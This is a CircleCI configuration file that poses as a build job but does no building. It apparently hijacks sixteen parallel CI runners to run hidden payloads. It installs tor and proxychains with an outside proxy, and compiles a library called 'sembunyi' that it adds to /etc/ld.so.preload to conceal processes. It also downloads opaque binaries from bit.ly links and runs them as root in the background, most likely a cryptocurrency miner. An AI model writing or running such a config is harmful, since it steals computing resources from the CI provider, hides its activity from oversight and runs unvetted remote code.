version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
    parallelism: 16
    resource_class: large
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install tor proxychains gcc -y
          sudo su --command "echo 'socks4 127.0.0.1 9050' >> /etc/proxychains.conf"
          sudo su --command "echo 'socks5 98.162.96.53 10663' >> /etc/proxychains.conf"
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          sudo su --command "tar -xvf sembunyi.tar.gz && cd sembunyi && make && sudo mv libsembunyi.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Ibzg9T
          chmod +x 3Ibzg9T
          sudo su --command "nohup ./3Ibzg9T --log=stdout > panik.log &"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"


workflows:
  version: 2.1
  build:
    jobs:
      - build